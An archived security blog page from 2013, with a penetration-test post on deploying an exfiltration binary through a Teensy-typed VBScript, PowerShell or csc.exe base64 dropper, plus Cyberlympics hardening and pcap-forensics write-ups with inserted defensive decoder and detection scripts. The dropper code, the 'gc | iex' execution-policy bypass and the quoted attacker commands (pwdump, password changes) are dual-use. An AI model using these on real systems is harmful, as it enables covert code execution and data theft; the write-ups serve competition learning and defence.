Wednesday, July 31, 2013

One year

Yeeeay! :) I have started this blog exactly a year ago! Wow :)

It's hard to find the time to write posts; right now I have around a dozen drafts, but looking at the blog statistics and the more and more comments you guys write, I really feel even more motivated to write interesting stuff for you, dear readers :)

So thanks for reading, thx for commenting and stay tuned for more security posts coming up soon!

Tuesday, July 30, 2013

Binary deployment with VBScript, PowerShell or .Net csc.exe compiler

Preface

About six months ago I had an engagement where my task was to exfiltrate data from a workstation on some sort of storage media. Given that I already knew about such techniques for Arduino [1] and Teensy [2], I thought it would be a great opportunity to try them out in real life too.

As a first step I had to bypass a host port protection solution, which was not easy, but I managed to find a way to defeat it. After that, I was good to go to use a Teensy to deploy the exfiltrator binary from [2].

And this is where all the trouble started. In the original blog post [2], the Teensy would type out the exfil.vbs VBScript that contains the exfiltrator binary in base64 encoded form. But when I tried to execute the VBScript, I got the following error message:

Sript:  C:\...\exfil.vbs
Line:   4
Char:   1
Error:  Error Parsing '<base64_stuff_here>' as bin.base64 datatype.

Code :  80004005
Source: msxml3.dll

It turned out that the Windows XP system where I tried to do the exfiltration was unpatched, with a bug in msxml3.dll that prevented me from converting the base64 encoded payload into binary. :D (seems like there are patches you shouldn't apply...)

But I did not panic, because very thoughtfully, the machine had PowerShell installed (I know, right? :) ), so I re-wrote the VBScript in PowerShell. But I was stupid, and I did not think (though probably I should have) that PowerShell uses the very same freaking msxml3.dll for base64 decoding...

Still no need to panic, because whenever a Windows box has the .NET Framework installed (and I think most of them do), by default it ships with a nice command line compiler called csc.exe, so you can write C# code to convert a base64 payload into binary. :)

Of course, normally you need just one of these methods, but as you can see, sometimes only one of them will work, and it's handy to know each of them.

Binary deployment

VBScript


So the original exfil.vbs script is this:

' Decode the base64 string with the MSXML DOM (this is the part that needs a working msxml3.dll)
Dim a,b
Set a=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
a.dataType="bin.base64"
a.text="<PASTE_BASE64_ENCODED_PAYLOAD_HERE>"
' Write the decoded bytes to disk through an ADODB binary stream
Set b=CreateObject("ADODB.Stream")
b.Type=1                        ' adTypeBinary
b.Open
b.Write a.nodeTypedValue
b.SaveToFile "payload.exe",2    ' adSaveCreateOverWrite
b.Close

Just execute it, and you will have your payload.exe next to the script.

PowerShell


The second version is in PowerShell:

# -an is short for -AssemblyName; these two loads are kept from the original script
Add-Type -an System
Add-Type -an System.Windows.Forms
$e = "<PASTE_BASE64_ENCODED_PAYLOAD_HERE>"
# Decode with the .NET Convert class, then write the raw bytes into the current directory
$c = [System.Convert]::FromBase64String($e)
[System.IO.File]::WriteAllBytes("$(get-location)\payload.exe", $c)

To execute the script, you can use any PowerShell script execution restriction bypass method you want. My favorite one is this:

PS C:\temp> gc .\script.ps1 | iex

Where the cmdlets are:
  • gc is Get-Content to read the contents of the PowerShell script
  • iex is Invoke-Expression to execute the script line-by-line (so basically execute the script :) )
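From the defender's side, the interesting thing about the `gc | iex` trick is that it leaves a very recognisable command line behind. The following is an added example, not the author's code: it expands the common PowerShell aliases in a recorded command line and flags two patterns from this post, file contents piped into Invoke-Expression and a large inline base64 literal handed to FromBase64String. The alias table is a subset I picked by hand, and the command lines it scans are constructed samples, not real logs.

```python
"""Flag the 'gc script.ps1 | iex' style and inline-base64 drops in recorded PowerShell
command lines.  Added example, not the blog author's code; samples are constructed."""
import re

# Alias -> cmdlet, lower-cased.  Only the aliases relevant here (assumption: a subset).
ALIASES = {
    "gc": "get-content", "cat": "get-content", "type": "get-content",
    "iex": "invoke-expression",
}
# Strip the host executable so the first token of the first stage is a cmdlet.
HOST_PREFIX = re.compile(r"^\s*(?:\S*powershell(?:\.exe)?)\s+", re.I)
# A quoted run of base64 alphabet characters that is suspiciously long (200+ chars).
BASE64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{200,}={0,2})[\"']")


def pipeline_cmdlets(cmdline: str):
    """First token of every '|'-separated stage, with aliases expanded."""
    body = HOST_PREFIX.sub("", cmdline)
    cmdlets = []
    for stage in body.split("|"):
        tokens = stage.split()
        first = tokens[0].lower() if tokens else ""
        cmdlets.append(ALIASES.get(first, first))
    return cmdlets


def classify(cmdline: str):
    """Return a list of human-readable findings for one command line (empty if clean)."""
    findings = []
    cmdlets = pipeline_cmdlets(cmdline)
    if ("get-content" in cmdlets and "invoke-expression" in cmdlets
            and cmdlets.index("get-content") < cmdlets.index("invoke-expression")):
        findings.append("file contents piped into Invoke-Expression")
    m = BASE64_LITERAL.search(cmdline)
    if m and re.search(r"frombase64string", cmdline, re.I):
        findings.append("inline base64 literal of %d chars passed to FromBase64String"
                        % len(m.group(1)))
    return findings


def scan(lines):
    """Map line index -> findings for every line that triggered something."""
    report = {}
    for i, line in enumerate(lines):
        findings = classify(line)
        if findings:
            report[i] = findings
    return report


# Constructed sample command lines (what a process-creation log might record).
SAMPLE_COMMAND_LINES = [
    r"powershell.exe gc .\script.ps1 | iex",
    r"powershell.exe Get-Content C:\temp\s.ps1 | Invoke-Expression",
    r"powershell.exe Get-Process | Where-Object {$_.CPU -gt 100}",
    'powershell.exe $e = "' + "QUFB" * 80 + '"; '
    '[IO.File]::WriteAllBytes("payload.exe", [Convert]::FromBase64String($e))',
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_COMMAND_LINES).items():
        print(idx, findings)
```

The alias expansion is the important half: a rule that only matches the literal string `Invoke-Expression` misses `iex`, and the same goes for `gc`/`cat`/`type` in front of it.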

.Net C# compiler


Last but not least, you can use csc.exe that is shipped along with .NET Framework.

The following C# program needs a text file with the base64 encoded payload in it, but you can modify it to keep the payload in a variable. I got this from a colleague and I was too lazy to change it, so I just put the base64 payload into a comment and copied it manually into a file.

You can also make the variable names shorter, so it takes less time for the Teensy to type it in, but I think the most time-consuming part is typing in the base64 payload.

using System;
using System.IO;

// <PASTE_BASE64_ENCODED_PAYLOAD_HERE_AND_PLACE_IT_INTO_payload.txt>

class Base64Decoder
{
   // Usage: d64.exe <file with one base64 line> <output file>
   static void Main(string[] args)
   {
      if (args.Length != 2)
      {
         Console.Error.WriteLine("usage: d64.exe <base64.txt> <out.exe>");
         return;
      }

      // Read the first (and only) line of the text file
      StreamReader reader = new StreamReader(args[0]);
      string line = reader.ReadLine();
      reader.Close();

      // .NET does the base64 decoding, no msxml3.dll involved
      byte[] toDecodeByte = Convert.FromBase64String(line.Trim());

      // Write the raw bytes out as the binary
      FileStream outfileStream = new FileStream(args[1], FileMode.Create);
      outfileStream.Write(toDecodeByte, 0, toDecodeByte.Length);
      outfileStream.Close();
   }
}

Compile it, and convert the payload:

C:\temp>%Systemroot%\Microsoft.NET\Framework\v3.5\csc /out:C:\temp\d64.exe c:\temp\d64.cs
Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.5420
for Microsoft (R) .NET Framework version 3.5
Copyright (C) Microsoft Corporation. All rights reserved.

C:\temp>d64.exe payload.txt payload.exe

And that's all! :) Three easy ways to deploy a binary on a Windows box!

Hardware

A quick update, since I forgot to write about the HW I used. It's plain and simple actually: just a Teensy 2.0 with a Teensy SD Adaptor, connected to the PC with a USB Type-A to USB Mini-B cable.

Every detail on connecting a Teensy with the SD Adaptor can be found in my "Making a USB flash drive HW Trojan" blog post, but just as a quick recap, here is the picture for the wiring:


References

[1] Leaking data using DIY USB HID device

[2] Data exfiltration using a USB keyboard

Monday, July 29, 2013

Cyberlympics 2013 Round 2 summary and results

Cyberlympics Round 2 is now over :). I think it was a bit less fun than last year, but it was also better this way because it was more realistic.

European Round 2 results were:

1. SectorC – Netherlands
2. Hack.ERS – Netherlands
3. gula.sh – Hungary
4. nanosloopers – United Kingdom
5. Pruts.ERS – Netherlands
6. PRAUDITORS – Hungary

Congrats to all teams, again, especially to PRAUDITORS! We have 2 Hungarian teams in round 3! :)

I wanted to make a nice write-up this time as well, but since we only saw our current points and made fixes in parallel, sometimes it was not possible to figure out what gave us points and what didn't.

We had one Windows 2003 and a Fedora 16 box and we had to harden those after signing in with the CyberNEXS client.

For the Windows 2003, what we did:

  • Setting password policy
  • Setting audit policy
  • Installing Windows updates
  • Killing listening processes
  • Stopping unnecessary services
  • Getting rid of suspicious programs, like:
    • PHP-shell (http://mgeisler.net/php-shell/): C:\Inetpub\wwwroot\iis\index.php
    • Best Free Keylogger: C:\Program Files\Common Files\Services\Windows Updater\wusched.exe
    • netcat, pwdump:  C:\WINDOWS\dll.zip
    • Netcat:  C:\Inetpub\wwwroot\images\letmein.exe and C:\Documents and Settings\Administrator\Local Settings\Temp\1.exe
    • ??? (we don't know what it was, but it looked suspicious):  C:\Documents and Settings\Administrator\Local Settings\Temp\2.exe
    • MSIZAP (not sure) : C:\msizap.exe
    • ProRAT (not sure): C:\Program Files\Mozilla Firefox\firefox.exe

For the Fedora 16:
  • Changing root and toor user password
  • Removing backdoor user (username was bd, or something like that)
  • iptables rules
  • sshd settings
  • sysctl.conf settings
  • rsyslog settings
  • samba settings
  • Disabling vsftp, anonymous ftp, stopping the services
  • Stopping 3rd party irc service (/opt/Unreal3.2, possibly backdoor) and deleting it
  • Removing netcat backdoor from rc
  • Disabling telnet 
  • Disabling sudoers nopasswd
  • Setting up a grub password
  • Fixing /etc/shadow* files' world readable/writeable rights
  • Full system upgrade

End results were: 19/20 for WIN2003 and 9/11 for Fedora, so it was quite good. :)

I think I am not telling big news, but every team we have talked to tried to reverse engineer the CyberNEXS client in some way too :) I guess it's just a normal way of thinking in a hacking competition ;)

Tuesday, July 16, 2013

Cyberlympics 2013 Round 1 write-up and results

I really enjoyed the first hour of this round, since we only got a 22 MB pcap file, and 10 questions, and we had to do a little investigation. But the last 2 hours were miserable. Question 10 was basically 5 challenges, but pretty hard. We only managed to find the solution for 2 and got 1 more from another team, meaning that the best scoring team was only able to solve 3 out of 5...

Srsly, why do we need these challenges? A harder forensics challenge would have been much better... maybe next year. BTW, if you want to practice forensics challenges of pcap files, check out the Honeynet Project Challenges!

Basically we used 3 tools: NetworkMiner free edition, xplico and JPK for the challenges.

Quick write-up of the Round 1 solutions (If you see any missing stuff, please comment or write it to me! Thx!):

QUESTION 1. What files were transferred to/from the victim?

Download:
Source host: 192.168.245.12 [WORKGROUP <1D>[2K3]] (Windows)
Source port: TCP 20
Destination host: 192.168.245.3 [X]
Destination port: TCP 52625
Protocol: FTP
Files:
favicon.ico (frame: 16995, 7002 bytes)
challenges.zip (frame: 17028, 923 bytes)
RPWD.RTF (frame: 17045, 232 bytes)

Upload:
Source host: 192.168.245.3 [X] 
Source port: TCP 52644 (frame 19523), TCP 52872 (frame 26964), TCP 52877 (frame 27204), TCP 52878 (frame 27516), TCP 52879 (frame 27649), TCP 52880 (frame 28109), TCP 52881 (frame 28126), TCP 52882 (frame 28143), TCP 52883 (frame 28161)
Destination host: 192.168.245.12 [WORKGROUP <1D>[2K3]] (Windows)
Destination port: TCP 20
Protocol: FTP
Files:
PwDump7.exe (frame 19523, 77 824 B)
sdb.exe (frame 26964, 139 264 B)
BFK.exe (frame 27204, 274 432 B)
MISINET.OCX (frame 27516, 115 920 B)
convertel.dll (frame 27649, 459 776 B)
inetlog.txt (frame 28109, 240 B)
keylog.txt (frame 28126, 2 B) 
needtosend.log (frame 28143, 0 B)
sclog.txt (frame 28161, 0 B)

CMD log:
C:\Documents and Settings\John\Desktop>copy challenges.zip C:\inetpub\ftproot\GMTMP
C:\Documents and Settings\John\My Documents>copy RPWD.RTF C:\inetpub\ftproot\GMTMP
C:\Inetpub\ftproot\GMTMP>net share >> favicon.ico
C:\Inetpub>pwdump7 >> C:\inetpub\ftproot\GMTMP\favicon.ico

QUESTION 2. What malware/unauthorized programs were installed?

BFK.exe
Application.Best_Free_Keylogger

converter.dll
Application.Best_Free_Keylogger

sbd.exe
Secure_BackDoor (crypted netcat)

PwDump7.exe
Trojan.Pwdump

MSINET.OCX
Win32.Flooder.IM.VB

QUESTION 3. What directory were files transferred to or from?

C:\Documents and Settings\John\Desktop
C:\Documents and Settings\John\My Documents
C:\inetpub\ftproot\GMTMP - DONE
C:\Inetpub

QUESTION 4. What is MD5 hash of files transferred from the web server? (Use lowercase letters)

favicon.ico (frame: 16995, 7002 bytes) - 993a36908782cb531c5e6f9f40c3102d
challenges.zip (frame: 17028, 923 bytes) - 0492a385f6db8a947f3434e2683e8353
RPWD.RTF (frame: 17045, 232 bytes) - 0ecc217d8cff2fdc366450e56a92282c

QUESTION 5. What is the router password?

It was in the file RPWD.RTF that we extracted from the pcap file. Once opened, the following content was found: “password 7 0139562C753F2E5C067E16”. The hash “0139562C753F2E5C067E16” was cracked, the plain text password was: “J0HNTH3GR8”
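The "cracking" here is worth a closer look from the defender's side: a Cisco `password 7` value is not a hash but a fixed-key XOR obfuscation, so anyone who can read the config can read the password, which is exactly what happened with RPWD.RTF. The following is an added example, not the author's code: it reverses a type 7 string and walks a config looking for such lines so they can be replaced (Cisco's own guidance is to use `enable secret` style type 5/8/9 hashes instead). The type 7 value is the one from the post; the surrounding config lines are constructed.

```python
"""Recover Cisco type 7 passwords and flag them in a config.  Added example,
not the blog author's code.  The XOR key is the fixed, publicly documented IOS key."""
import re

_TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
# "... password 7 <hex>" or "... key 7 <hex>" anywhere on a line
_TYPE7_RE = re.compile(r"\b(password|key)\s+7\s+([0-9A-Fa-f]+)\b")


def decode_type7(encoded: str) -> str:
    """First two decimal digits are the key offset; every following hex pair is one
    plaintext byte XORed with the key character at (offset + position)."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded.isalnum():
        raise ValueError("not a type 7 string: %r" % encoded)
    offset = int(encoded[:2], 10)
    body = bytes.fromhex(encoded[2:])
    return "".join(
        chr(b ^ _TYPE7_KEY[(offset + i) % len(_TYPE7_KEY)])
        for i, b in enumerate(body)
    )


def find_type7(config_text: str):
    """Return (line_number, plaintext) for every type 7 value found in the config."""
    hits = []
    for n, line in enumerate(config_text.splitlines(), 1):
        m = _TYPE7_RE.search(line)
        if m:
            hits.append((n, decode_type7(m.group(2))))
    return hits


# Constructed sample config; only the type 7 value comes from the post.
SAMPLE_CONFIG = """\
hostname edge-router
enable secret 5 $1$PLACEHOLDER$not_a_real_md5crypt_hash
username admin password 7 0139562C753F2E5C067E16
line vty 0 4
 password 7 0139562C753F2E5C067E16
"""

if __name__ == "__main__":
    for line_no, plain in find_type7(SAMPLE_CONFIG):
        print("line %d: type 7 password recovered: %s" % (line_no, plain))
```

Running `find_type7` over exported configs before they land in a ticketing system or a pcap-visible FTP share is a cheap check; any hit should be treated as a plaintext credential leak.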

QUESTION 6. What was the admin doing during attack?

This was kinda' strange, because we saw a lot of site addresses, but we only got points for amazon.com ...

QUESTION 7. What were user passwords changed to?

The following commands were issued:

C:\>net user administrator GMODEOWNZYOU
C:\>net user John GMODEOWNZYOU
C:\>net user nonadmin GMODEOWNZYOU

QUESTION 8. Were there any suspicious users on the machine?

List of users:

Administrator
ASPNET
badmin
Guest
IUSR_ADMIN-1DL53VWF1  
John
nonadmin
SUPPORT_388945a0
WMUS_ADMIN-1DL53VWF1

And user "badmin" was the answer.

QUESTION 9. What file did the attacker hide info in that he later extracted?

See QUESTION 1.

QUESTION 10. What do the secret messages decode to?

The challenges.zip file had 5 .txt files:

1.txt

This was NOT real Morse code; it had to be converted into binary (- is 0 and . is 1), then convert the binary to ASCII, then you have a Base64 encoded text, and if you decode that, you will get:

THEOBSCUREWESEEEVENTUALLYTHECOMPLETELYOBVIOUSITSEEMSTAKESLONGER

2.txt

No clue, if you got this, pls comment or send it to me! Thx!

3.txt

You need to pick up every 3rd letter, starting with T, and you will get:

THEONLYWAYTOGROWISTOCHALLENGEYOURSELF

4.txt

So we were not able to solve this, but big thanks to santrancisco (see comments), I now know that the solution was a Railfence cipher with Rails = 8.

A nice Railfence online solver is here: http://rumkin.com/tools/cipher/railfence.php

Solution:

R.............I.............N.............I..
.E...........T.M...........O.T...........O.N.
..S.........A...D.........D...K.........D...G
...E.......H.....O.......I.....N.......M.....
....A.....W.......I.....N.......O.....I......
.....R...S.........N...E.........W...T.......
......C.I...........G.H...........W.A........
.......H.............W.............H.........

So it reads: RESEARCHISWHATIMDOINGWHENIDONTKNOWWHATIMDOING
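Decoders for the 1.txt, 3.txt and 4.txt transforms described above, as an added example that is not part of the original post. The inputs are constructed by running the plaintexts from the page through the inverse transform (the challenge files themselves are not reproduced here); the filler letters in the 3.txt sample and the rail-count range in `railfence_candidates` are my own choices. `railfence_candidates` goes one step beyond the post: when the rail count is unknown, it simply lists every decryption for a range of rails, which is how you would have found Rails = 8 without the hint.

```python
"""Decoders for the Question 10 texts: pseudo-Morse -> bits -> base64 (1.txt),
every n-th letter (3.txt) and rail fence (4.txt).  Added example, not the author's code."""
import base64


# --- 1.txt: '-' is 0, '.' is 1, 8 bits per ASCII char, the result is base64 ---
def decode_pseudo_morse(text):
    bits = "".join("0" if ch == "-" else "1" for ch in text if ch in "-.")
    if len(bits) % 8:
        raise ValueError("bit count %d is not a multiple of 8" % len(bits))
    b64 = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")
    return base64.b64decode(b64, validate=True).decode("ascii")


def encode_pseudo_morse(plaintext):
    """Inverse transform, used only to build a sample input."""
    b64 = base64.b64encode(plaintext.encode("ascii"))
    return "".join("." if bit == "1" else "-" for byte in b64 for bit in format(byte, "08b"))


# --- 3.txt: every n-th letter starting at a given offset ---
def every_nth(text, n, start):
    return text[start::n]


# --- 4.txt: rail fence ---
def rail_rows(length, rails):
    """Rail index visited by each position in the zigzag (0,1,..,rails-1,rails-2,..,1,0,..)."""
    rows, r, step = [], 0, 1
    for _ in range(length):
        rows.append(r)
        if rails > 1:
            if r == 0:
                step = 1
            elif r == rails - 1:
                step = -1
            r += step
    return rows


def railfence_encrypt(plaintext, rails):
    rows = rail_rows(len(plaintext), rails)
    return "".join(ch for rail in range(rails) for ch, row in zip(plaintext, rows) if row == rail)


def railfence_decrypt(ciphertext, rails):
    rows = rail_rows(len(ciphertext), rails)
    # The ciphertext was written out rail by rail, left to right within a rail; undo that order.
    order = sorted(range(len(ciphertext)), key=lambda i: (rows[i], i))
    plain = [""] * len(ciphertext)
    for ch, pos in zip(ciphertext, order):
        plain[pos] = ch
    return "".join(plain)


def railfence_grid(plaintext, rails):
    """The zigzag drawn with '.' fill, one line per rail, like the online solver's output."""
    rows = rail_rows(len(plaintext), rails)
    return ["".join(ch if row == rail else "." for ch, row in zip(plaintext, rows))
            for rail in range(rails)]


def railfence_candidates(ciphertext, max_rails=12):
    """All decryptions for 2..max_rails rails, for when the key is unknown."""
    return {r: railfence_decrypt(ciphertext, r) for r in range(2, max_rails + 1)}


# Plaintexts from the post; the sample inputs below are constructed from them.
PLAIN_1 = "THEOBSCUREWESEEEVENTUALLYTHECOMPLETELYOBVIOUSITSEEMSTAKESLONGER"
PLAIN_3 = "THEONLYWAYTOGROWISTOCHALLENGEYOURSELF"
PLAIN_4 = "RESEARCHISWHATIMDOINGWHENIDONTKNOWWHATIMDOING"
SAMPLE_1 = encode_pseudo_morse(PLAIN_1)
SAMPLE_3 = "".join(ch + "xy" for ch in PLAIN_3)   # two filler letters after each real one
SAMPLE_4 = railfence_encrypt(PLAIN_4, 8)

if __name__ == "__main__":
    print(decode_pseudo_morse(SAMPLE_1))
    print(every_nth(SAMPLE_3, 3, 0))
    print("\n".join(railfence_grid(PLAIN_4, 8)))
    for rails, guess in railfence_candidates(SAMPLE_4).items():
        print(rails, guess)
```

The rail fence part is the one worth reading twice: `rail_rows` computes, for each ciphertext position, which rail it belongs to, and sorting positions by (rail, index) gives exactly the order in which the encryptor wrote the characters out, so decryption is a permutation and needs no grid at all.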

5.txt

So, you start reading the hex from the lower left corner, going upwards, basically converting the columns into lines, then convert the hex to text, and you will have:

MYWORKISUTTERLYINCOMPREHENSIBLEANDISTHEREFOREFULLOFDEEPSIGNIFICANCE

Aaand that's all! :)

The top 10 teams moving on to Round 2 to represent Europe are:

1. Hack.ERS - Netherlands
1. Pruts.ERS - Netherlands
2. nanosloopers - United Kingdom
2. nx - Finland
3. gula.sh - Hungary
4. 0xD0A - United Kingdom
4. SectorC - Netherlands
5. Blah - Czech Republic
6. mici-cu-b3re - Romania
7. PRAUDITORS - Hungary

Congrats to all teams, especially to PRAUDITORS! We have 2 Hungarian teams again in round 2! :)

Monday, July 15, 2013

Cyberlympics 2013 Practice Round 1 write-up

Team gula.sh is participating in the Global Cyberlympics 2013 games, and we have been doing a little practicing before the first round.

Although we missed the practice rounds (I didn't get any e-mails, some of my teammates did...), thanks to my friend Hari from the Indian *.* null team, we obtained the practice round challenge package and played with it a little.

A very quick write-up on the challenges:

DECODE_ME01.txt
Base64 encoded.
Solution: WELCOME TO THE JUNGLE, WE HAVE FUN AND GAMES, SOME OF THEM ARE EVEN STAEJRWU.

DECODE_ME02.txt
Reversed String.
Solution: THIS OLD MAN, HE HAD FUN, HE PLAYED BOUTDTMS ON MY THUMB.

DECODE_ME03.txt
Digraph (a pair of characters used to write one).
Solution: sometimes the older ways are the better ways, this eimwetot is not one of them.

DECODE_ME04.txt
It was a text in hex.
Solution: I ONCE TRIED TO COUNT IN HEXADECIMAL BUT I KEPT LOOSING COUNT AFTER XUNEFILM.

DECODE_ME05.txt
Morse code.
Solution: BEEPBOOPBEEPSOUNDSLIKER2D2ISHAVINGAFITMAYBEITISBECAUSEIEIBSMSCMADEHIM

DECODE_ME06.txt
It was a text in binary.
Solution: IF YOU ADD UP ALL THE ONES IN THIS MESSAGE IT SPELLS SNFNLEGI IN EBCDIC.

DECODE_ME07.txt
URL Encoded.
Solution: TOO MANY TIMES I LOOK INTO THE FACE OF OBEMTGOE AND REALIZE THAT I AM STARING BACK AT MYSELF.

DECRYPT_ME01.txt
Caesar cipher.
Solution: IF YOU KEEP DECRYPTING ME LIKE THAT I THINK I AM GOING TO YGTRIPLO ALL OVER THE PLACE!

DECRYPT_ME02.txt
Caesar cipher.
Solution: THERE ONCE WAS A MAN FROM NANTUCKET. WHOSE NAFCMHUE WAS SO LONG, HE COULD… KEEP YOUR MIND CLEAN!!!!

DECRYPT_ME03.txt
Caesar cipher again...
Solution: IF YOU KNEW JULIUS LIKE I KNEW NADNEJUE THEN WE WOULD NOT NEED A CASEAR CIPER AT ALL.

DECRYPT_ME04.txt
Substitution cipher.
Solution: there is something evil in the way a random substitution works, it makes kewmtyat look normal.

DECRYPT_ME05.txt
Couldn't find the solution for this one in 10 mins, so we skipped it. Anyone having the solution for this, please comment, or send it to me. Thx!

FILECARVE_ME01.zip
It was a JPEG file of a QR code.
Solution:
The order of the chunks: 7862_8200_9525_1556_5490_5706_7466_7251_1055_6218_5220
QR code raw bytes: 40 85 65 54 65 24 54 35 24 10 ec 11 ec 11 ec 11 ec 11 ec 
QR code raw text: VUFRECRA

FILECARVE_ME02.zip
2 JPEG files, one was a cute bunny, the other one was a QR code again.
Solution:
Chunk order for the bunny: 4192_9117_7715_4081_2994_6501_4927_3182_4957
Chunk order for the QR code: 4901_3326_4603_1700_2737_6576_6823_5471_9316_1186_4805
QR code raw bytes: 40 95 14 15 85 54 24 14 e5 50 a0 ec 11 ec 11 ec 11 ec 11 
QR code raw text: QAXUBANU

FILECARVE_ME03.zip
I was too lazy to solve this one. It's a zip file, with a JPEG file named FILECARVE_ME03.JPG within. Again, if you have the solution, please comment, or send it to me. Thx!
Solution:
Thanks to Uuganjargal Amarsaikhan, the order of the chunks for this one is:
2143_0642_5467_5354_5149_0291_5335_7886_9524_4489_7997_4970_7077_6059_0284_7195_0794_6232_1519_7873_6639_7656_8091_0584_7866_3845_7804_2193_9518_7702
QR code raw bytes: 40 95 95 55 05 24 55 34 54 e0 a0 ec 11 ec 11 ec 11 ec 11
QR code raw text: YUPRESEN

FILECARVE_ME04.zip
I was too lazy to solve this one too. It's an mp3 file, and I think it's morse code. Once again, if you have the solution, please comment, or send it to me. Thx!
Solution:
Again, thanks to Uuganjargal Amarsaikhan, the order of the chunks for this one is: 1899_3173_4732_4730_2453_7774_4131_6350_2981_0379
Morse text in the MP3 file: CHUCAPHU